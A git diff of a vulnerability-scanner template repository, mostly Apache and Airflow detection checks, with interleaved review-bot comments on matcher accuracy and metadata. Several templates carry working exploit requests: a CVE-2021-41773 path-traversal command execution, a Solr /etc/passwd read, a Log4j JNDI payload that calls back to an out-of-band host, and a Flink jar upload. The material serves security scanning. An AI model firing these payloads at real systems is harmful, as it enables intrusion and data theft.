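Review bot: The new side of `airflow-panel-245.yaml` probes only `{{BaseURL}}/admin/airflow/login` and matches only `Airflow - Login`; the `{{BaseURL}}/login/` path and the `Sign In - Airflow` title are removed. The `airflow-default-login-236.yaml` template in this same patch requests `/login/` and carries the shodan query `title:"Sign In - Airflow"`, so instances with that login page exist and this template now reports nothing for them. For an exposure inventory that is a silent miss. Keep both paths with `stop-at-first-match: true` and both titles with `condition: or`, as the removed lines had.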
diff --git a/poc/airflow/unauthenticated-airflow-10886.yaml b/poc/airflow/unauthenticated-airflow-10886.yaml deleted file mode 100644 index afe4ed1f3c..0000000000 --- a/poc/airflow/unauthenticated-airflow-10886.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-airflow-instance -info: - name: Unauthenticated Airflow Instance - author: dhiyaneshDK - severity: high - metadata: - shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Airflow - DAGs" - - type: status - status: - - 200 diff --git a/poc/airflow/unauthenticated-airflow.yaml b/poc/airflow/unauthenticated-airflow.yaml index 93eb15068c..afe4ed1f3c 100644 --- a/poc/airflow/unauthenticated-airflow.yaml +++ b/poc/airflow/unauthenticated-airflow.yaml @@ -1,31 +1,23 @@ id: unauthenticated-airflow-instance - info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high metadata: - max-request: 2 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth,misconfig - -http: + tags: apache,airflow,unauth +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - "Airflow - DAGs" - - type: status status: - 200 - -# digest: 4a0a004730450221008ff04d74351dc40542a499d88517999e66dc8504d16a8fa83df765ab850de2cc0220093c9335dd06ec425df7afb41e2306101fb637e6c30106c02891f8c001e7e805:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-answer-detect.yaml b/poc/apache/apache-answer-detect.yaml new file mode 100644 index 0000000000..47afbcc440 --- /dev/null +++ b/poc/apache/apache-answer-detect.yaml 
@@ -0,0 +1,45 @@ +id: apache-answer-detect + +info: + name: Apache Answer - Detection + author: omranisecurity + severity: info + description: | + Detects Apache Answer version through API endpoit + reference: + - https://answer.apache.org/ + metadata: + shodan-query: http.favicon.hash:523757057 + fofa-query: icon_hash="523757057" + verified: true + max-request: 1 + tags: detect,tech,apache + +http: + - method: GET + path: + - "{{BaseURL}}/answer/api/v1/siteinfo" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"code":' + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + regex: + - '"version":"([^"]+)"' +# digest: 4b0a00483046022100e8b6cf0b4a146a98e2ea5be56454a84686c4de20f506b9c297c3b34b02905d930221008eb6c97ad0a6509d1e883e58004163afbfe3453aa32e30608e988f5e8df25d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/apache/apache-apisix-panel-336.yaml b/poc/apache/apache-apisix-panel-336.yaml index 2c6124e710..dbd94dc5bf 100644 --- a/poc/apache/apache-apisix-panel-336.yaml +++ b/poc/apache/apache-apisix-panel-336.yaml @@ -5,11 +5,14 @@ info: author: pikpikcu severity: info description: An Apache APISIX login panel was detected. - classification: - cwe-id: CWE-200 metadata: fofa-query: title="Apache APISIX Dashboard" tags: apache,apisix,panel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET diff --git a/poc/apache/apache-apisix-panel-337.yaml b/poc/apache/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/poc/apache/apache-apisix-panel-337.yaml +++ /dev/null 
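Review bot: The body matcher in the new `apache-answer-detect.yaml` looks only for `"code":`, which together with `application/json` and status 200 describes almost any JSON API, so another application answering on `/answer/api/v1/siteinfo` would be labelled Apache Answer. The extractor already expects `"version":"…"` in the same body, so require it in the matcher too by adding `- '"version":'` to the word list with `condition: and`. The file ends with a `# digest:` line, so any edit has to be re-signed rather than hand-patched. `endpoit` in the description is a typo for `endpoint`.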
@@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/poc/apache/apache-apisix-panel-338.yaml b/poc/apache/apache-apisix-panel-338.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/poc/apache/apache-apisix-panel-338.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/apache/apache-axis-detect-339.yaml b/poc/apache/apache-axis-detect-339.yaml new file mode 100644 index 0000000000..3d78cd86bd --- /dev/null +++ b/poc/apache/apache-axis-detect-339.yaml @@ -0,0 +1,32 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: tech,axis2,middleware,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + + - type: status + status: + - 200 
diff --git a/poc/apache/apache-axis-detect.yaml b/poc/apache/apache-axis-detect-341.yaml similarity index 100% rename from poc/apache/apache-axis-detect.yaml rename to poc/apache/apache-axis-detect-341.yaml diff --git a/poc/apache/apache-cocoon-detect-342.yaml b/poc/apache/apache-cocoon-detect-342.yaml deleted file mode 100644 index 64f8870cf3..0000000000 --- a/poc/apache/apache-cocoon-detect-342.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: apache-cocoon-detect - -info: - name: Apache Cocoon detect - author: ffffffff0x - severity: info - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"Apache Cocoon" - fofa-query: app="APACHE-Cocoon" - tags: apache,cocoon,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "X-Cocoon-Version" - - extractors: - - type: regex - part: header - regex: - - 'X\-Cocoon\-Version:([ 0-9.]+)' - -# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-cocoon-detect.yaml b/poc/apache/apache-cocoon-detect.yaml new file mode 100644 index 0000000000..1d3b85ddc5 --- /dev/null +++ b/poc/apache/apache-cocoon-detect.yaml @@ -0,0 +1,27 @@ +id: apache-cocoon-detect +info: + name: Apache Cocoon detect + author: ffffffff0x + severity: info + metadata: + fofa-query: app="APACHE-Cocoon" + tags: apache,cocoon,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: header + words: + - "X-Cocoon-Version" + + extractors: + - type: regex + part: header + regex: + - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/poc/apache/apache-detect.yaml b/poc/apache/apache-detect-346.yaml similarity index 100% rename from poc/apache/apache-detect.yaml rename to poc/apache/apache-detect-346.yaml 
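Review bot: `redirects: true` in the new apache-cocoon-detect.yaml follows redirects to any host, so an `X-Cocoon-Version` header returned by a different host after a redirect would be attributed to the scanned target. The -342 variant removed in the same patch used `host-redirects: true` under `http:`, which keeps the check on the original host; the new file should use that as well. It also loses the `verified`, `max-request` and `shodan-query` metadata that variant carried.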
diff --git a/poc/apache/apache-detect-348.yaml b/poc/apache/apache-detect-348.yaml index eeb8966be3..ba499c5ea5 100644 --- a/poc/apache/apache-detect-348.yaml +++ b/poc/apache/apache-detect-348.yaml @@ -1,30 +1,30 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server +id: apache-detect +info: + name: Apache Detection + author: philippedelteil + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + severity: info + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server \ No newline at end of file diff --git a/poc/apache/apache-flink-unauth-rce-355.yaml b/poc/apache/apache-flink-unauth-rce-355.yaml deleted file mode 100644 index dbae4dd542..0000000000 --- a/poc/apache/apache-flink-unauth-rce-355.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: apache-flink-unauth-rce - -info: - name: Apache Flink - Remote Code Execution - author: pikpikcu - severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-77 - metadata: - max-request: 1 - tags: apache,flink,rce,intrusive,unauth - -http: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-httpd-rce-362.yaml b/poc/apache/apache-httpd-rce-362.yaml deleted file mode 100644 index e5f0bcbea2..0000000000 --- a/poc/apache/apache-httpd-rce-362.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: apache-httpd-rce - -info: - name: Apache HTTPd - 2.4.49 (CGI enabled) RCE - author: pdteam - severity: critical - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://github.com/blasty/CVE-2021-41773 - tags: cve,cve2021,rce,apache - -requests: - - raw: - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; id - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - condition: and - part: body - words: - - 'uid=' - - 'gid=' - - 'groups=' - - extractors: - - type: regex - regex: - - "(u|g)id=.*" diff --git a/poc/apache/apache-httpd-rce.yaml b/poc/apache/apache-httpd-rce.yaml index 6c7d8e9b31..89a987e51b 100644 --- a/poc/apache/apache-httpd-rce.yaml +++ b/poc/apache/apache-httpd-rce.yaml @@ -1,5 +1,4 @@ id: apache-httpd-rce - info: name: Apache HTTPd - 2.4.49 (CGI enabled) RCE author: pdteam 
@@ -11,17 +10,11 @@ info: - https://twitter.com/ptswarm/status/1445376079548624899 - https://github.com/blasty/CVE-2021-41773 tags: cve,cve2021,rce,apache - requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - - raw: + - raw: - | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Subdomains}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded echo Content-Type: text/plain; echo; id @@ -30,7 +23,6 @@ requests: - type: status status: - 200 - - type: word condition: and part: body @@ -38,7 +30,6 @@ requests: - 'uid=' - 'gid=' - 'groups=' - extractors: - type: regex regex: diff --git a/poc/apache/apache-solr-file-read-368.yaml b/poc/apache/apache-solr-file-read-368.yaml new file mode 100644 index 0000000000..390f09194e --- /dev/null +++ b/poc/apache/apache-solr-file-read-368.yaml @@ -0,0 +1,43 @@ +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + tags: apache,solr,lfi + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/apache/apache-solr-file-read-369.yaml b/poc/apache/apache-solr-file-read-369.yaml deleted file mode 100644 index ccb3629709..0000000000 
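Review bot: The `tags:` line kept as context in apache-httpd-rce.yaml is `cve,cve2021,rce,apache`, although the request runs a command on the target host. Adding `intrusive`, as the removed apache-flink-unauth-rce-355.yaml had, lets operators exclude the template from scans of production systems: `tags: cve,cve2021,rce,apache,intrusive`. The `info` block starts above this hunk, so whether it carries a `classification` with the CVE id cannot be seen from here.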
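Review bot: apache-solr-file-read-368.yaml is added without the `description` and `classification` fields (`cvss-metrics`, `cvss-score: 7.5`, `cwe-id: CWE-22`) that the -369 variant deleted in the same patch carried, so findings from it lose the data used for triage and reporting. Carry those fields over into the new file's `info` block. The second request also shows `¶m=ContentStream`, which looks like an entity-decoding artifact; if that character is in the file itself rather than in this rendering, the check will not behave as written upstream and should be compared against the original template.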
--- a/poc/apache/apache-solr-file-read-369.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: apache-solr-file-read - -info: - name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk - severity: high - description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: apache,solr,lfi - -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/07/22 diff --git a/poc/apache/apache-solr-log4j-rce-372.yaml b/poc/apache/apache-solr-log4j-rce-372.yaml new file mode 100644 index 0000000000..bd31144333 --- /dev/null +++ b/poc/apache/apache-solr-log4j-rce-372.yaml 
@@ -0,0 +1,36 @@ +id: apache-solr-log4j-rce + +info: + name: Apache Solr Log4j JNDI RCE + author: Evan Rubinstein,nvn1729 + severity: critical + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + reference: + - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 + - https://twitter.com/sirifu4k1/status/1470011568834424837 + - https://github.com/apache/solr/pull/454 + tags: solr,oast,log4j,rce,apache,jndi + +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-solr-log4j-rce.yaml b/poc/apache/apache-solr-log4j-rce.yaml index bd31144333..825bad33de 100644 --- a/poc/apache/apache-solr-log4j-rce.yaml +++ b/poc/apache/apache-solr-log4j-rce.yaml 
@@ -1,36 +1,77 @@ id: apache-solr-log4j-rce info: - name: Apache Solr Log4j JNDI RCE - author: Evan Rubinstein,nvn1729 + name: Apache Solr 7+ - Remote Code Execution (Apache Log4j) + author: Evan Rubinstein,nvn1729,j4vaovo severity: critical - description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + description: | + Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. reference: - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - https://twitter.com/sirifu4k1/status/1470011568834424837 - https://github.com/apache/solr/pull/454 - tags: solr,oast,log4j,rce,apache,jndi + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + verified: true + max-request: 2 + shodan-query: http.html:"Apache Solr" + tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" +http: + - raw: + - | + @timeout: 25s + GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 + Host: {{Hostname}} + + payloads: + endpoint: + - "collections" + - "cores" + attack: clusterbomb matchers-condition: and matchers: - type: word - part: interactsh_protocol # 
Confirms the DNS Interaction + part: body + words: + - 'org.apache.solr' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' extractors: + - type: kval + kval: + - interactsh_ip + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + +# digest: 4a0a00473045022100c38d41d1823fa63da240e259a1003d23723889cd20ac19f9eaab674d5664a03c022018ea30db1d9f2f1a5c8884ad3b21735fc7a02a73f18e35b35a7ff9506e56d4e9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-storm-unauth.yaml b/poc/apache/apache-storm-unauth.yaml index dc48849fe9..2a2c45e566 100644 --- a/poc/apache/apache-storm-unauth.yaml +++ b/poc/apache/apache-storm-unauth.yaml @@ -1,20 +1,14 @@ id: apache-storm-unauth - info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: - - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - metadata: - max-request: 1 + reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html tags: apache,unauth,misconfig - -http: +requests: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' - matchers-condition: and matchers: - type: word @@ -23,9 +17,6 @@ http: - '"totalMem":' - '"stormVersion":' condition: and - - type: status status: - 200 - -# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 
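Review bot: The three `interactsh_request` regexes on the new side of apache-solr-log4j-rce.yaml are identical, and the comments that explained the old ones (`# Match for extracted ${hostName} variable`, `# Print extracted ${hostName} in output`) were removed, so nothing says why one extractor uses `group: 2` and the other `group: 1`. Add a comment to each regex line stating what the capture holds, for example `# group 1: ${hostName} value reported by the target` and `# group 2: injection-point label from the callback name`; the second reading is inferred from the `.uri.` label in the request line and should be confirmed. With a single `endpoint` payload list, `attack: clusterbomb` also deserves a short comment or removal.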
diff --git a/poc/apache/default-apache-test-all-6814.yaml b/poc/apache/default-apache-test-all-6814.yaml index 480d651a06..ce2216bbb0 100644 --- a/poc/apache/default-apache-test-all-6814.yaml +++ b/poc/apache/default-apache-test-all-6814.yaml @@ -3,11 +3,11 @@ id: default-apache-test-all info: name: Apache HTTP Server Test Page author: andydoering - severity: info description: Detects default installations of apache (not just apache2 or installations on CentOS) + severity: info + tags: tech,apache metadata: shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" - tags: tech,apache requests: - method: GET diff --git a/poc/apache/default-apache-test-all.yaml b/poc/apache/default-apache-test-all.yaml deleted file mode 100644 index ce2216bbb0..0000000000 --- a/poc/apache/default-apache-test-all.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: default-apache-test-all - -info: - name: Apache HTTP Server Test Page - author: andydoering - description: Detects default installations of apache (not just apache2 or installations on CentOS) - severity: info - tags: tech,apache - metadata: - shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: regex # type of the extractor - part: body # part of the response (header,body,all) - condition: or - regex: - - ".*?Apache(|\\d+) .*?(Default|Test).*?" - - "(Default|Test).*? Apache(|\\d+).*?" - - extractors: - - type: kval - part: header - kval: - - server diff --git a/poc/apache/default-apache-test-page-6816.yaml b/poc/apache/default-apache-test-page-6816.yaml index 69f573761a..f727151d6a 100644 --- a/poc/apache/default-apache-test-page-6816.yaml +++ b/poc/apache/default-apache-test-page-6816.yaml 
@@ -1,15 +1,17 @@ id: default-apache-test-page + info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 tags: tech,apache + reference: https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/poc/apache/default-apache-test-page-6818.yaml b/poc/apache/default-apache-test-page-6818.yaml index ade74d648c..268acbeed0 100644 --- a/poc/apache/default-apache-test-page-6818.yaml +++ b/poc/apache/default-apache-test-page-6818.yaml @@ -5,10 +5,11 @@ info: author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,3 +19,5 @@ requests: words: - "Apache HTTP Server Test Page powered by CentOS" part: body + +# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-page-6804.yaml b/poc/apache/default-apache2-page-6804.yaml index 2aa462ac02..5b0059bd91 100644 --- a/poc/apache/default-apache2-page-6804.yaml +++ b/poc/apache/default-apache2-page-6804.yaml @@ -4,12 +4,10 @@ info: name: Apache2 Default Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Apache2 Debian Default Page:" tags: tech,apache + reference: https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22 -http: +requests: - method: GET path: - '{{BaseURL}}' 
@@ -19,5 +17,3 @@ http: words: - "Apache2 Debian Default Page: It works" part: body - -# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-page-6806.yaml b/poc/apache/default-apache2-page-6806.yaml index 2f32e210bc..2aa462ac02 100644 --- a/poc/apache/default-apache2-page-6806.yaml +++ b/poc/apache/default-apache2-page-6806.yaml @@ -5,10 +5,11 @@ info: author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache2 Debian Default Page:" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,3 +19,5 @@ requests: words: - "Apache2 Debian Default Page: It works" part: body + +# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-ubuntu-page-6810.yaml b/poc/apache/default-apache2-ubuntu-page-6810.yaml index 83b392e20a..3efd0d3dea 100644 --- a/poc/apache/default-apache2-ubuntu-page-6810.yaml +++ b/poc/apache/default-apache2-ubuntu-page-6810.yaml @@ -5,15 +5,19 @@ info: author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache2 Ubuntu Default Page" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "Apache2 Ubuntu Default Page: It works" part: body + +# digest: 4a0a00473045022100daed8690f24f8c0009d7167980aeee76223c786cfdcaf5b5c0e9ec6c830f5c240220648f0f8615f54d45ff1d6f251ef25e42441e1a12c23ee2a6864375e5fe44e494:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-ubuntu-page.yaml b/poc/apache/default-apache2-ubuntu-page.yaml deleted file mode 100644 index 6738fe2192..0000000000 --- a/poc/apache/default-apache2-ubuntu-page.yaml +++ /dev/null 
@@ -1,17 +0,0 @@ -id: default-apache2-ubuntu-page -info: - name: Apache2 Ubuntu Default Page - author: dhiyaneshDk - severity: info - metadata: - shodan-query: http.title:"Apache2 Ubuntu Default Page" - tags: tech,apache -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - "Apache2 Ubuntu Default Page: It works" - part: body diff --git a/poc/api/alfacgiapi-wordpress-256.yaml b/poc/api/alfacgiapi-wordpress-256.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-256.yaml +++ b/poc/api/alfacgiapi-wordpress-256.yaml 
